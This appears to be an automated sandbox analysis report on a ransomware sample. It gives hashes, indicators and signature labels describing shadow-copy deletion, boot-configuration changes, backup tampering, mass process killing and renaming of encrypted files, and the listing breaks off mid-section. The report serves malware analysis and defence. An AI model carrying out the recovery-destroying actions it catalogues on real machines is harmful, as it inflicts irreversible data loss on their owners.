Analysis
-
max time kernel
152s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
26-12-2021 08:08
Static task
static1
Behavioral task
behavioral1
Sample
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe
-
Size
338KB
-
MD5
b99ce03482978a861c883bb772be3b25
-
SHA1
84ecf8f8b0de2dbb3df4b99766a84143e49eaa00
-
SHA256
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91
-
SHA512
a9261830ed6a6c93fcd6fd7c8483d917f2b4235bc9dd586eac9d10bdb6ca2872c6101ea512ecc2abc176a60afa576aa0856db25c66bc29bf81fe2a11c94875c1
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3500 bcdedit.exe 1908 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 3256 wbadmin.exe 1452 wbadmin.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exedescription ioc process File renamed C:\Users\Admin\Pictures\RedoGet.png => C:\Users\Admin\Pictures\RedoGet.png.MRAC 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe -
Drops file in Windows directory 9 IoCs
Processes:
wbadmin.exeMicrosoftEdgeCP.exewbadmin.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File created C:\Windows\rescache\_merged\3720402701\1659841449.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File created C:\Windows\rescache\_merged\3720402701\1659841449.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 2364 vssadmin.exe 3712 vssadmin.exe -
Kills process with taskkill 45 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1344 taskkill.exe 2436 taskkill.exe 1732 taskkill.exe 1124 taskkill.exe 4988 taskkill.exe 1568 taskkill.exe 1168 taskkill.exe 3348 taskkill.exe 1172 taskkill.exe 4280 taskkill.exe 4536 taskkill.exe 1048 taskkill.exe 820 taskkill.exe 2472 taskkill.exe 4060 taskkill.exe 1612 taskkill.exe 976 taskkill.exe 2592 taskkill.exe 4556 taskkill.exe 4976 taskkill.exe 4884 taskkill.exe 3148 taskkill.exe 3160 taskkill.exe 2800 taskkill.exe 5072 taskkill.exe 1372 taskkill.exe 2332 taskkill.exe 4092 taskkill.exe 4384 taskkill.exe 3888 taskkill.exe 3132 taskkill.exe 900 taskkill.exe 4020 taskkill.exe 3272 taskkill.exe 4744 taskkill.exe 1352 taskkill.exe 4296 taskkill.exe 4276 taskkill.exe 3616 taskkill.exe 4112 taskkill.exe 4332 taskkill.exe 1036 taskkill.exe 1308 taskkill.exe 3728 taskkill.exe 4436 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000675ab6758feb3b1e0194ae527886bc235feb103cb308898cacccf0dab82cb9cb8e0811531481e6a693f3fec8653a395079b423acd8b0ec1da21ea41d37d9 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8b1f29dcbdedd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000a7bfdf49cfbb64d0dd224584b8d8c53a9ff48d67f0ec465cec1f1889b232202db4f5749f60b93c55f24a715ac50291b570977587bea424b8e2179afe69ebc101c0ecbc0eb8737d92683ba6030ed1d38ec64a9193332a65898ca85771ced832975d451da6230b616bd09414ab106511c793aff0000a9ca50aa572ca6dd41a2390479e3b98ee9f57e8f9f699a0d8dd5ace3b659bc9121b4572e41516de7bd21e8b6e98ed04385128d71a028324965be125d00ba3815fc77cb94631abb2201e2122a0d314d5d33f833bfe56c8b90efeb255ca43227a64c0c736706655149d1f09528eefeaa4c48b4390739467c275e6263172ace4f02a26b4044554b32ef4f53023e78cc2bd0e5482d7995aff9d8c32486babe590540819353c029b68864bc1f1a4214bf821ffb91a78664af8c4a304207bee90939949b9b9fa74db03dce7a1293a08caa5a423dc78f61a0288b8e97b4cd1484cbb9716260c3d8fb3b7a8bfb6213979aa4419e9db2e699c23c7802bb75c5ab6b85d802f80768797c56f1e66217cd4f48b36875bd8ccd55a4e85b865d8f7547976ed5e5ce7475aaefed7832957233ef663445e8595 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000006fb5ef5877fad5c179078e80a04c954ee738a1a21b40089674c6622f605f140297106c81fc880f62c77b559503e1253ff2a90fc066eb01836e7f MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = bca03f4542ecd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 6052f8b26d0fd801 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\MrtCache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "345299836" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe -
Runs net.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
MicrosoftEdgeCP.exepid process 3076 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
